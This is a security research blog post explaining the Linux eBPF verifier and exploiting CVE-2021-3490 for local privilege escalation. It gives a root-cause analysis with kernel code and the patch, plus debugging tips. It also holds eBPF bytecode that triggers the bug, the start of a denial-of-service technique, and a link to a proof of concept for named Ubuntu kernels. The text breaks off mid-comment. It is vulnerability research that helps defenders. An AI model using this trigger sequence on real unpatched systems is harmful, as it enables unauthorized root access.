
Kernel Pwning with eBPF: a Love Story


By: Valentina Palmiotti, @chompie1337

At Grapl we believe that in order to build the best defensive system we need to deeply understand attacker behaviors. As part of that goal we're investing in offensive security research. Keep up with our blog for new research on high risk vulnerabilities, exploitation, and advanced threat tactics.

Find the released local privilege escalation (LPE) Proof-of-Concept for CVE-2021-3490 here: https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490. It targets Ubuntu 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58, and Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17.

This blog post is intended to give a detailed overview of eBPF from the perspective of an exploit developer. In this post, I cover:

  • The basics of how eBPF works

  • The internals of the eBPF verifier

  • A vulnerability (CVE-2021-3490) I exploit for local privilege escalation [13].

  • Debugging eBPF bytecode

  • Exploitation techniques for DoS, information leak, and LPE

  • Some interesting observations and other bugs I discovered

  • New mitigations that make the bug class more difficult to exploit

  • Weaknesses that are still present in eBPF today

I had no knowledge of eBPF going into this. My hope is that by sharing a PoC as well as my experience developing it, it can help others get started with eBPF exploitation.

eBPF: a Primer


Extended Berkeley Packet Filter: What is it?

Berkeley Packet Filter (BPF) was initially created as a way to perform packet filtering in the kernel. Its capabilities were later redesigned and extended to create extended Berkeley Packet Filter (eBPF) [1].

Put simply, eBPF provides a way for a user mode application to run code in the kernel without needing to write a kernel module. The purported benefits of using eBPF versus a kernel module are ease of use, stability, and security. There are also performance improvements gained by doing certain tasks directly in the kernel compared to a pure user mode program. eBPF programs are used to do a myriad of things such as: tracing, instrumentation, hooking system calls, debugging, and of course, packet capturing/filtering.

eBPF programs are written in a high level language and compiled into eBPF bytecode using a toolchain (such as BCC[18]). The eBPF VM uses a simple instruction set with eleven* 64-bit registers, a program counter, and a 512 byte fixed-size stack. Ten registers are general purpose read-write, one is a read-only stack pointer, and the program counter is implicit [2]. The instruction set is similar to x86, and operates on both 64 and 32 bit values.

BPF_MOV64_IMM(BPF_REG_0, 0)
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4)
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10)
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4)
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1)
BPF_MOV32_IMM(BPF_REG_3, 0xFFFFFFFF)

Example of eBPF bytecode instructions

*Technically, it uses 12 registers, but the 12th register is an auxiliary register only used to perform ALU sanitation operations [12].

A user mode application loads the bytecode into the kernel using the bpf() [14] syscall, where the eBPF verifier will perform a number of checks to ensure the program is “safe” to run in the kernel. This verification step is critical - eBPF exposes a path for unprivileged users to execute code in ring 0.

After the program is loaded, the user mode application attaches the program to a “hook point”. A hook point is a place in the kernel where eBPF programs can be attached [5]. eBPF programs are event driven, meaning the program will execute when certain events occur at the hook point. The classic use case is attaching an eBPF program to a socket, where the program will execute when data is written to it.
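
For example, attaching an already-loaded socket filter program to a socket is a plain setsockopt() call. The sketch below is illustrative and assumes prog_fd is a file descriptor returned by a previous BPF_PROG_LOAD call:

#include <sys/socket.h>
#include <netinet/in.h>

#ifndef SO_ATTACH_BPF
#define SO_ATTACH_BPF 50 /* from <asm-generic/socket.h> */
#endif

/* Sketch: attach a loaded socket filter program (prog_fd) to a UDP socket.
 * The program will then run for every packet received on that socket. */
int attach_prog_to_socket(int prog_fd)
{
    int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

    if (sock < 0)
        return -1;

    if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF,
                   &prog_fd, sizeof(prog_fd)) < 0)
        return -1;

    return sock;
}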

If the kconfig knob CONFIG_BPF_JIT is set, the eBPF program is JIT compiled into native assembly instructions after it is verified and loaded. Otherwise, when the program is executed it is run in the eBPF interpreter which decodes and executes the eBPF bytecode instructions.

User mode applications can interact with and get data from the eBPF program running in the kernel using eBPF maps and eBPF helper functions, which are accessed via the bpf() syscall.


The sysctl knob kernel.unprivileged_bpf_disabled determines whether unprivileged users are allowed to run eBPF programs. If it is not set, unprivileged users are allowed to attach an eBPF program to a socket that the user owns. In many Linux distributions, such as Ubuntu, unprivileged_bpf_disabled is not enabled by default. Because of this, I decided to look into eBPF more closely, as allowing unprivileged users to run code in the kernel is a ripe attack surface.

eBPF Maps

I mentioned above that user mode processes can interact with an eBPF program in the kernel using eBPF maps. They can also be used by multiple eBPF programs to interact with each other. Maps are a generic key/value store with an arbitrary data structure [6]. There are various types of maps including: arrays, queues, and stacks.

A map is described by five different attributes:

  • type - the data structure of the map

  • key_size - the size in bytes of the key used to index an element (used in array maps)

  • value_size - the size in bytes of each element

  • max_entries - the maximum number of entries in the map

  • map_flags - describes special characteristics of the map, such as if the entire map memory should be preallocated or not.

eBPF maps can be created and altered from user space via the bpf() syscall: they are created with the BPF_MAP_CREATE command, updated with the BPF_MAP_UPDATE_ELEM command, and their contents retrieved with the BPF_MAP_LOOKUP_ELEM command. eBPF maps can be accessed by eBPF programs using the file descriptor returned by BPF_MAP_CREATE and calling eBPF helper functions, which will return pointers to values within the map.
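
As a rough illustration (not taken from the PoC), creating a small array map through the raw syscall looks something like this:

#include <linux/bpf.h>
#include <sys/syscall.h>
#include <string.h>
#include <unistd.h>

/* Sketch: create a BPF_MAP_TYPE_ARRAY map with a single 8-byte value.
 * Returns the map file descriptor on success, -1 on failure. */
static int create_array_map(void)
{
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_type    = BPF_MAP_TYPE_ARRAY;
    attr.key_size    = 4;   /* array maps are indexed by a 4-byte key */
    attr.value_size  = 8;
    attr.max_entries = 1;

    return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

Elements can then be written from user space with the BPF_MAP_UPDATE_ELEM command and read back with BPF_MAP_LOOKUP_ELEM, using the same syscall. The returned file descriptor is what an eBPF program uses to reference the same map.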

The eBPF Verifier

The exploit I wrote leverages a bug in the eBPF verifier. So before I delve into the vulnerability it is important to briefly explain the internals of the verifier.

The verifier starts by building a control flow graph of the program. Then, it will verify each instruction is valid and all memory accesses are safe through each possible flow of control [3]. Afterwards, it will add in runtime checks to the program. This process, called ALU Sanitation, inserts patches to the eBPF bytecode to ensure permitted memory ranges are not violated during runtime when performing pointer arithmetic [4].

The verifier tries to enforce this general set of rules:

  • No back edges, loops, or unreachable instructions.

  • No pointer comparisons can be performed, and only scalar values can be added or subtracted to a pointer. A scalar value in the eBPF verifier is any value that is not derived from a pointer. The verifier keeps track of which registers contain pointers and which contain scalar values.

  • Pointer arithmetic can not leave the “safe” bounds of a map. Meaning, the program cannot access anything outside the predefined map memory. To do so, the verifier keeps track of the upper and lower bounds of the values for each register.

  • No pointers can be stored in maps or stored as a return value, in order to avoid leaking kernel addresses to user space.

Range Tracking

The verifier stores the following bound values, for every register in each possible path of execution, to ensure there are no out-of-bound memory accesses:

  • umin_value , umax_value store the min/max value of the register when interpreted as an unsigned (64 bit) integer

  • smin_value , smax_value store the min/max value of the register when interpreted as a signed (64 bit) integer.

  • u32_min_value , u32_max_value store the min/max value of the register when interpreted as an unsigned (32 bit) integer.

  • s32_min_value , s32_max_value store the min/max value of the register when interpreted as a signed (32 bit) integer.

  • var_off contains information about the bits of the register that are known. It is stored in a structure called tnum which contains two 64 bit fields: mask and value . Every bit that is set in mask means the value of that bit is unknown. The unset bits are known, and their true values are stored in value . For example, if var_off = {mask = 0x0; value = 0x1} , all bits of the register are known, and the register is known to have a value of 1. If var_off = {mask = 0xFFFFFFFF00000000; value = 0x3} it means that the lower 32 bits of the register are known to be 0x00000003 and the upper 32 bits are unknown.

These bounds are used to update each other. In particular, if var_off indicates the register is a known constant, the min/max bounds are updated to reflect the known value. We will see why this is important later!
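
To make the var_off semantics concrete, here is a small illustrative helper (my own sketch, not kernel code) that checks whether a concrete runtime value is consistent with a given tnum:

#include <stdint.h>
#include <stdbool.h>

/* Illustrative only: mirrors the tnum semantics described above. */
struct tnum_ex {
    uint64_t value; /* values of the known bits                 */
    uint64_t mask;  /* bit set = unknown, bit clear = known bit */
};

/* A runtime value is possible iff it agrees with `value` on every known bit. */
static bool tnum_allows(struct tnum_ex t, uint64_t runtime_val)
{
    return (runtime_val & ~t.mask) == t.value;
}

/* Example: {mask = 0xFFFFFFFF00000000, value = 0x3} allows 0x3 and
 * 0xdeadbeef00000003, but not 0x5. */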

ALU Sanitation

ALU Sanitation is a feature that was introduced to supplement the static range tracking of the verifier. The idea is to prevent OOB memory accesses if the value of registers do not fall within their expected range during runtime. This was added to help mitigate potential vulnerabilities in the verifier and protect against speculative attacks.

For every arithmetic operation that involves a pointer and a scalar register, an alu_limit is calculated. This represents the maximum absolute value that can be added to or subtracted from the pointer [4]. Before each of these operations, the bytecode is patched with the following instructions:

*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);
*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg);

Note that off_reg represents the scalar register being added to the pointer register, and BPF_REG_AX represents the auxiliary register.

The above instructions do the following:

  1. The value of alu_limit is loaded into BPF_REG_AX .

  2. The value of off_reg at runtime is subtracted from alu_limit and stored into BPF_REG_AX . If off_reg > alu_limit , the highest bit of BPF_REG_AX is set (the sign bit).

  3. If the difference stored in BPF_REG_AX is positive and off_reg is negative, indicating that alu_limit and the register’s value have opposing signs, the BPF_OR operation will set the sign bit.

  4. The BPF_NEG operation negates BPF_REG_AX , which flips its sign bit: if the sign bit was set, it becomes 0, and if it was not, it becomes 1.

  5. The BPF_ARSH operation does an arithmetic right shift of 63 bits. This fills BPF_REG_AX with either all 0s or 1s, the value of the sign bit.

  6. Depending on the result of the above operation, the BPF_AND operation will either null out off_reg or leave it unchanged.

This means that if off_reg exceeds alu_limit , or if off_reg and alu_limit have opposing signs, the value of off_reg will be replaced with 0, nulling the pointer arithmetic operation.
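
In C terms, the patched sequence behaves roughly like the following (my own paraphrase, assuming an arithmetic right shift as performed by the eBPF VM; not kernel code):

#include <stdint.h>

/* Rough equivalent of the patched bytecode above: returns the offset that
 * actually gets used for the pointer arithmetic, which is either off_reg
 * itself or 0 if off_reg exceeds alu_limit or has an opposing sign. */
static int64_t sanitized_offset(int64_t off_reg, int64_t alu_limit)
{
    int64_t ax = alu_limit - off_reg; /* sign bit set if off_reg > alu_limit       */
    ax |= off_reg;                    /* sign bit set if off_reg is negative       */
    ax = -ax;                         /* BPF_NEG: flips the sign bit (non-zero ax) */
    ax >>= 63;                        /* all ones if safe, all zeroes if not       */
    return ax & off_reg;              /* off_reg when safe, 0 otherwise            */
}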

alu_limit Computation:

The way alu_limit is calculated was recently updated [15]. The new implementation may not have been adopted yet by some Linux distributions. For completeness, I will cover both, and revisit why the differences matter as they become relevant in the next sections.

Previously:

The alu_limit is determined by the boundaries of the pointer register. Meaning, if the pointer register points to the beginning of a map, the alu_limit for subtraction is 0, and the alu_limit for addition is equal to the size of the map (minus 1). The alu_limit is updated with subsequent operations on the pointer register.

Now:

The alu_limit is determined by the boundaries of the offset register. Meaning, the value of the offset register at runtime is compared against the register’s boundaries computed during the verifier’s static range tracking.

My initial knowledge of the eBPF verifier came from this excellent blog post by Manfred Paul detailing his exploitation of CVE-2020-8835. I highly recommend checking it out!

The Vulnerability

We now have enough background to do a root cause analysis of CVE-2021-3490.

Recall that the eBPF instruction set can operate on both the entire 64 bits of registers or just the lower 32 bits. For this reason, the verifier range tracking contains separate bounds for the lower 32 bits of a register: {u,s}32_{min,max}_value .

These bounds are updated for every operation. Each operation has two tracking functions with a 64 bit and a 32 bit counter part. Both are called for a 64 bit operation in the function adjust_scalar_min_max_vals .

/* WARNING: This function does calculations on 64-bit values, but
 * the actual execution may occur on 32-bit values. Therefore,
 * things like bitshifts need extra checks in the 32-bit case.
 */
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                                      struct bpf_insn *insn,
                                      struct bpf_reg_state *dst_reg,
                                      struct bpf_reg_state src_reg)
{
...
        case BPF_AND:
                dst_reg->var_off = tnum_and(dst_reg->var_off,
                                            src_reg.var_off);
                scalar32_min_max_and(dst_reg, &src_reg);
                scalar_min_max_and(dst_reg, &src_reg);
                break;
        case BPF_OR:
                dst_reg->var_off = tnum_or(dst_reg->var_off,
                                           src_reg.var_off);
                scalar32_min_max_or(dst_reg, &src_reg);
                scalar_min_max_or(dst_reg, &src_reg);
                break;
        case BPF_XOR:
                dst_reg->var_off = tnum_xor(dst_reg->var_off,
                                            src_reg.var_off);
                scalar32_min_max_xor(dst_reg, &src_reg);
                scalar_min_max_xor(dst_reg, &src_reg);
                break;

...
}

The bug, CVE-2021-3490, is found in the 32 bit tracking function for BPF_AND , BPF_OR , and BPF_XOR operations. It is the same in each of the functions.

Let’s take a look at an excerpt of the offending code for BPF_AND :

static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
                                 struct bpf_reg_state *src_reg)
{
    bool src_known = tnum_subreg_is_const(src_reg->var_off);
    bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
    struct tnum var32_off = tnum_subreg(dst_reg->var_off);
    s32 smin_val = src_reg->s32_min_value;
    u32 umax_val = src_reg->u32_max_value;


    /* Assuming scalar64_min_max_and will be called so its safe
    * to skip updating register for known 32-bit case.
    */
    if (src_known && dst_known)
        return;
...
}

As shown in the code snippet above, if the lower 32 bits of both the source and destination register are known, the function skips updating the 32 bit bounds.

The comment above the return states that this is OK, because the 64 bit counterpart will take care of it. Let’s take a look:

static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
                              struct bpf_reg_state *src_reg)
{
    bool src_known = tnum_is_const(src_reg->var_off);
    bool dst_known = tnum_is_const(dst_reg->var_off);
    s64 smin_val = src_reg->smin_value;
    u64 umin_val = src_reg->umin_value;

    if (src_known && dst_known) {
            __mark_reg_known(dst_reg, dst_reg->var_off.value);
            return;
    }
  ...
}

Indeed, we can see if src_known and dst_known are true, the function __mark_reg_known will be called. Can you spot the problem?

In scalar32_min_max_and , the _known variable is calculated using tnum_subreg_is_const . The 64 bit counterpart, scalar_min_max_and , uses tnum_is_const . The difference is that the former returns true if the lower 32 bits of the register are known constants, and the latter returns true only if the entire 64 bits are constant. If the operation involves registers where the lower 32 bits are known but the upper 32 bits are unknown, the assumption stated in the comment is violated.
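
The two helpers differ only in how much of the register they look at. Roughly, paraphrasing the kernel's tnum helpers in include/linux/tnum.h:

/* A tnum is a constant when no bit is unknown, i.e. its mask is zero. */
static inline bool tnum_is_const(struct tnum a)
{
    return !a.mask;
}

/* tnum_subreg() keeps only the lower 32 bits, so this only requires the
 * lower 32 bits to be known constants. */
static inline bool tnum_subreg_is_const(struct tnum a)
{
    return !(tnum_subreg(a)).mask;
}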

In the function adjust_scalar_min_max_vals , before returning, the bounds of the destination register are updated one last time by calling the following three functions:

__update_reg_bounds(dst_reg);
__reg_deduce_bounds(dst_reg);
__reg_bound_offset(dst_reg);
return 0;

Each of these functions have 32 and 64 bit counterparts. I’ll just cover the 32 bit case, since that is what the bug affects.

First, the register's bounds are updated using the current bounds and var_off .

static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
    struct tnum var32_off = tnum_subreg(reg->var_off);

    /* min signed is max(sign bit) | min(other bits) */
    reg->s32_min_value = max_t(s32, reg->s32_min_value,
                               var32_off.value | (var32_off.mask & S32_MIN));

    /* max signed is min(sign bit) | max(other bits) */
    reg->s32_max_value = min_t(s32, reg->s32_max_value,
                               var32_off.value | (var32_off.mask & S32_MAX));
    reg->u32_min_value = max_t(u32, reg->u32_min_value,
                               (u32)var32_off.value);
    reg->u32_max_value = min(reg->u32_max_value,
                             (u32)(var32_off.value | var32_off.mask));
}

Notice that the min bounds are set to either the current min or the known value of the register, whichever is larger. Similarly, the max bounds are set to either the current max or the known value of the register, whichever is smaller.

Then, the signed and unsigned bounds are used to update each other in __reg32_deduce_bounds .

/* Uses signed min/max values to inform unsigned, and vice-versa */

static void __reg32_deduce_bounds(struct bpf_reg_state *reg)
{
    /* Learn sign from signed bounds.
     * If we cannot cross the sign boundary, then signed and
     * unsigned bounds
     * are the same, so combine.  This works even in the
     * negative case, e.g.
     * -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
     */
    if (reg->s32_min_value >= 0 || reg->s32_max_value < 0) {
            reg->s32_min_value = reg->u32_min_value =
                    max_t(u32, reg->s32_min_value, reg->u32_min_value);
            reg->s32_max_value = reg->u32_max_value =
                    min_t(u32, reg->s32_max_value, reg->u32_max_value);
            return;
    }
...
}


Finally, the unsigned bounds are used to update var_off in __reg_bound_offset .

static void __reg_bound_offset(struct bpf_reg_state *reg)
{
    struct tnum var64_off = tnum_intersect(reg->var_off,
                                           tnum_range(reg->umin_value,
                                                      reg->umax_value));
    struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
                                           tnum_range(reg->u32_min_value,
                                                      reg->u32_max_value));

    reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off);
}

Here,

  • tnum_range returns a tnum representing the possible values given a range of unsigned integers.

  • tnum_intersect takes two tnums and combines the knowledge conveyed by both into a single tnum (see the snippet just below).
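
The latter (lightly reformatted from kernel/bpf/tnum.c, as of the kernels discussed here) boils down to: a bit stays unknown only if it is unknown in both inputs, and the known bits are merged.

struct tnum tnum_intersect(struct tnum a, struct tnum b)
{
    u64 v, mu;

    v = a.value | b.value;   /* merge the known bit values               */
    mu = a.mask & b.mask;    /* a bit is unknown only if unknown in both */
    return TNUM(v & ~mu, mu);
}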

Let’s go through the steps using an example so we can understand why this is a critical vulnerability.

Suppose we have the instruction BPF_ALU64_REG(BPF_AND, R2, R3). This instruction performs an AND operation on registers R2 and R3 and saves the results in R2.

  • R2 has var_off = {mask = 0xFFFFFFFF00000000; value = 0x1}, meaning the lower 32 bits are known to have a value of 1, and the upper 32 bits are unknown. Because the lower 32 bits of the register are known, its 32-bit bounds are all equal to that value (1).

  • R3 has var_off = {mask = 0x0; value = 0x100000002}, meaning the entire 64 bits are known and equal to 0x100000002.

The steps to update the 32 bit bounds of R2 are as follows:

  1. As shown in the BPF_AND case of the adjust_scalar_min_max_vals snippet above, the function tnum_and is called first. This will perform an AND operation and save the results in var_off of the destination register, R2. Recall, the lower 32 bits in both of the registers are known. All of the bits of R3 are known: the upper 31 bits are 0, the 32nd bit is 1, and the lower 32 bits equal 2. This leaves R2 with var_off = {mask = 0x100000000; value = 0x0} : the lower 32 bits are known to be 0 because 2 & 1 = 0, every other bit is known to be 0, and only the 32nd bit stays unknown, since R3 has a 1 there while the corresponding bit of R2 is unknown.

  2. On the next line, scalar32_min_max_and is called. We already know that this function will return immediately and make no changes to the bounds, because the lower 32 bits of both registers are known.

  3. Then __update_reg32_bounds is called. This will set u32_max_value = 0 , because for the lower 32 bits var32_off.value | var32_off.mask = 0 , which is smaller than the current u32_max_value = 1 . Meanwhile, u32_min_value stays at 1, because var32_off.value = 0 is smaller than the current minimum. The same goes for the signed bounds.

  4. The functions __reg32_deduce_bounds and __reg_bound_offset will not make any changes to the bounds.

Now we can see that in this case, we are left with a register where {u,s}32_max_value = 0 < {u,s}32_min_value = 1 !

Now, let’s look at the patch.

@@ -7084,11 +7084,10 @@ static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
         s32 smin_val = src_reg->s32_min_value;
         u32 umax_val = src_reg->u32_max_value;
 
-        /* Assuming scalar64_min_max_and will be called so its safe
-         * to skip updating register for known 32-bit case.
-         */
-        if (src_known && dst_known)
+        if (src_known && dst_known) {
+                __mark_reg32_known(dst_reg, var32_off.value);
                 return;
+        }

Above we can see that now, __mark_reg32_known is called on the destination register before returning if the lower 32 bits of the source and destination register are known constants.

Why does this matter? Let’s take a look at what __mark_reg32_known does:

/* Mark the unknown part of a register (variable offset or scalar
 * value) as known to have the value @imm.
 */
static void __mark_reg32_known(struct bpf_reg_state *reg, u64 imm)
{
    reg->var_off = tnum_const_subreg(reg->var_off, imm);
    reg->s32_min_value = (s32)imm;
    reg->s32_max_value = (s32)imm;
    reg->u32_min_value = (u32)imm;
    reg->u32_max_value = (u32)imm;
}

The function above sets all of the 32 bit boundaries to the value of the register’s lower 32 bits, which are known to be constant. The correct bounds will be preserved when the final boundary updating functions are called, fixing the bug.

Debugging eBPF Programs

Before getting into exploitation, I’ll briefly cover a couple of ways to debug eBPF programs when writing exploits. I specifically say “when writing exploits”, because there are many tools available to help write and debug eBPF programs for legitimate uses, via emulation. One such tool is rbpf[10], which is a Rust user space virtual machine for eBPF. However, because I exploited a bug in the eBPF verifier, it was important to be able to debug it directly in the kernel to replicate the exact behavior. Additionally, I wrote the bytecode by hand (as opposed to using a toolchain to compile a program into bytecode) so it made using these tools less practical.

Verifier Log Output

When loading an eBPF program, you have the option to specify a log level and a buffer to receive log output from the verifier.

char verifier_log_buff[0x200000] = {0};

union bpf_attr prog_attrs =
{
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insn_cnt = cnt,
    .insns = (uint64_t)insn,
    .license = (uint64_t)"",
    .log_level = 2,
    .log_size = sizeof(verifier_log_buff),
    .log_buf = verifier_log_buff
};
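
Loading the program is then just a raw bpf() syscall with these attributes, and the log can be dumped when the verifier rejects it (sketch; cnt , insn , and verifier_log_buff come from the snippet above):

#include <linux/bpf.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <stdio.h>

/* Sketch: load the program described by prog_attrs and print the
 * verifier's log if the program is rejected. */
int prog_fd = syscall(__NR_bpf, BPF_PROG_LOAD, &prog_attrs, sizeof(prog_attrs));
if (prog_fd < 0)
{
    printf("verifier rejected program:\n%s\n", verifier_log_buff);
}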

This is useful for debugging loading failures when the verifier rejects the program.

34: (bf) r6 = r3
35: R0_w=invP0 R2_w=map_value(id=0,off=0,ks=4,vs=4919,imm=0) R3_w=map_value(id=0,off=0,ks=4,vs=4919,imm=0) R4_w=invP0 R5_w=invP4294967298 R6_w=map_value(id=0,off=0,ks=4,vs=4919,imm=0) R7_w=invP(id=0) R10=fp0 fp-8=mmmm????
35: (7b) *(u64 *)(r2 +8) = r6
R6 leaks addr into map

Example verifier log output

Keep in mind that if you choose to provide a log output buffer, it should be large enough to receive the entire output. If it is not, loading the program will fail, even if the program is valid and passes the verifier checks. This is easy to hit with long programs, because the verifier prints output for every instruction on each path it traverses. I ran into this issue while writing my exploit, so I thought it was worth noting.

Runtime Debugging

Verifier log output provides a lot of useful info, particularly when playing with a verifier vulnerability. Being brand new to eBPF, I wanted to get familiar with the eBPF instruction set. I also wanted to be able to look at the values of registers during program runtime, like in a debugger such as gdb or Windbg.

I found that there isn’t really a straightforward way to do this, but I did find a solution.

As previously mentioned, eBPF programs are either JIT compiled after verification and run natively, or decoded and executed within the eBPF interpreter. This depends on the kernel configuration CONFIG_BPF_JIT .

If JIT is disabled, eBPF bytecode is decoded and executed in kernel/bpf/core.c in the function ___bpf_prog_run :

/**
 *    __bpf_prog_run - run eBPF program on a given context
 *    @regs: is the array of MAX_BPF_EXT_REG eBPF pseudo registers
 *    @insn: is the array of eBPF instructions
 *
 * Decode and execute eBPF instructions.
 */
 
static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn)
{
...
 select_insn:
        goto *jumptable[insn->code];
...
}

Register values are pointed to by regs and the program instructions by insn .

To get the value of a register during each instruction of the program, you can simply insert a printk statement before each instruction is executed. An example is shown below:

static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn)
{
...
    int lol = 0;
   
   // Check the first instruction to match the first instruction of  
   // the target eBPF program to debug, so output isn't printed for  
   // every eBPF program that is ran.
    if(insn->code == 0xb7)
    {
        lol = 1;
    }


select_insn:
        if(lol)
        {
            printk("instruction is: %0x\n", insn->code);
            printk("r0: %llx, r1: %llx, r2: %llx\n", regs[0], 
            regs[1], regs[2]);
            ...
        }
        goto *jumptable[insn->code];
...
}

You will need to compile the kernel yourself with CONFIG_BPF_JIT disabled. For a quick startup on how to compile a kernel yourself and run it with qemu , check out syzkaller’s guide[11].

This helped me learn the instruction set, and figure out the calling convention for calling eBPF helper functions. It also helped me identify some new mitigations introduced into ALU Sanitation that I will cover later.

Exploitation

Triggering the Vulnerability

The specifics of the bug were covered in the Vulnerability section. Here, I will go through the bytecode that triggers the bug.

Remember, we need two registers with tnum s in the same state as shown in the example. That is, one register with var_off = {mask = 0xFFFFFFFF00000000; value = 0x1} and one with var_off = {mask = 0x0; value = 0x100000002} .

The latter is easy. Since all the bits are known, we can load the register with the constant value. We will store this value in an arbitrary register referred to as CONST_REG . Due to the instruction op size, we are restricted to working with 32 bit values. We create the 64 bit value (0x100000002) across a few instructions:

// Load 1 into the register
BPF_MOV64_IMM(CONST_REG, 0x1)
// Left shift 32 bits, the value is now 0x100000000
BPF_ALU64_IMM(BPF_LSH, CONST_REG, 32)
// Add 2, the value is now 0x100000002
BPF_ALU64_IMM(BPF_ADD, CONST_REG, 2)

Now, for the other register: we need to have the upper 32 bits of mask set. We can start with a value that is unknown to the verifier, meaning that all the bits of mask are set. The most straightforward way to do this is to load a value from an eBPF map. This way, we can also control the actual value at runtime, which will become useful later. First, we need to retrieve a pointer to an eBPF map we created prior to loading the program, which has file descriptor store_map_fd .

// Load a pointer to the store_map_fd map into R1.
BPF_LD_MAP_FD(BPF_REG_1, store_map_fd)
BPF_MOV64_REG(BPF_REG_2, BPF_STACK_REG)
// Load 0 into R0
BPF_MOV64_IMM(BPF_REG_0, 0)
// Store value of R0=0 at stack_ptr-4.
BPF_STX_MEM(BPF_W, BPF_STACK_REG, BPF_REG_0, -4)
// Set R2 = stack_ptr-4
BPF_MOV64_REG(BPF_REG_2, BPF_STACK_REG)
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4)
// Call helper function map_lookup_elem. First parameter is in R1 (map
// pointer). Second parameter is in R2 (ptr to elem index value):
// *(word*)(stack_ptr-4) = 0
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem)

Now a pointer to the first element in our map will be returned in register R0 . From there we can read from it and load a value into an arbitrary register I will refer to as EXPLOIT_REG . That will be our second bug-triggering register.

// Read 8 bytes from the returned map element pointer and store it in
// EXPLOIT_REG.
BPF_LDX_MEM(BPF_DW, EXPLOIT_REG, BPF_REG_0, 0)

Since user space has full control over what is stored in an eBPF map, the verifier will mark this register as having a completely unknown value. That is, var_off = {mask = 0xFFFFFFFFFFFFFFFF; value = 0x0} . Now, we just have to set the lower 32 bits as known with value 1.

// Set R2 to be 0xFFFFFFFF
BPF_MOV64_IMM(BPF_REG_2, 0xFFFFFFFF)
// Left shift R2 32 bits, so the value is now 0xFFFFFFFF00000000
BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32)
// AND EXPLOIT_REG with R2 and store the result in EXPLOIT_REG.
// The upper 32 bits remain unknown, but the lower 32 bits are known to be 0.
BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, BPF_REG_2)
// Add 1 to EXPLOIT_REG. It now has mask = 0xFFFFFFFF00000000 and value = 0x1
BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1)

Now we trigger the vulnerability by performing an AND operation on the two registers we set up.

// Trigger the bug. EXPLOIT_REG now has u32_min_value=1, u32_max_value=0
BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, CONST_REG)

The actual value we store in the map, and thus the value of EXPLOIT_REG , will be set to 0. We’ll use that later on.

Denial of Service (DoS)

We now have a register EXPLOIT_REG , with invalid 32 bit bounds u32_min_value=1 and u32_max_value=0 .

My first attempt at exploitation wasn’t useful for LPE but it did result in an easy DoS exploit. I learned a bit more about how the verifier patches bytecode in the process.

Recall that the verifier checks all possible execution paths. This can be computationally costly, so optimizations are performed to reduce the number of paths it needs to traverse. One is using the bounds of a register to determine the outcome of a conditional statement.

For example:

BPF_JMP32_IMM(BPF_JGE, EXPLOIT_REG, 1, 5)

The above instruction will jump five instructions if the value of the lower 32 bits of EXPLOIT_REG is greater than or equal to 1.

For a JGE 32 bit conditional, the verifier will attempt to determine if only one branch is taken by checking the u32_min_value of the register:

static int is_branch32_taken(struct bpf_reg_state *reg, u32 val, u8 opcode)
{
        struct tnum subreg = tnum_subreg(reg->var_off);
        s32 sval = (s32)val;


        switch (opcode) {
...
        case BPF_JGE:
                if (reg->u32_min_value >= val)
                       return 1;
                else if (reg->u32_max_value < val)
                        return 0;
..
}

Notice that is_branch32_taken will return true if u32_min_value >= 1 . Because EXPLOIT_REG has the invalid bound u32_min_value = 1 , it returns TRUE . This means that the verifier believes the TRUE branch will always be taken, and will not check the FALSE branch. In reality, EXPLOIT_REG will have a value of 0 at runtime, so it will take the FALSE branch. This means that we can put any instructions we’d like in the FALSE branch and the verifier won’t check them for safety!
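
A sketch of what such a program shape looks like (the jump offset and the contents of the branch are illustrative, not taken from the PoC):

// Because u32_min_value = 1, the verifier assumes the conditional jump is
// always taken and never verifies the two instructions that follow it.
// At runtime EXPLOIT_REG is 0, so execution actually falls through into
// that "dead" branch.
BPF_JMP32_IMM(BPF_JGE, EXPLOIT_REG, 1, 2)
// --- treated as dead code by the verifier ---
BPF_MOV64_IMM(BPF_REG_0, 0)
BPF_EXIT_INSN()
// --- verified code continues here ---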

At this point, I thought that I would be able to insert the rest of my exploit into this branch and have free rein. However, the verifier patches all instructions in “dead” branches.

/* The verifier does more data flow analysis than llvm and will not
 * explore branches that are dead at run time. Malicious programs  
 * can have dead code too. Therefore replace all dead at-run-time  
 * code with 'ja -1'.
 *
 * Just nops are not optimal, e.g. if they would sit at the end of 
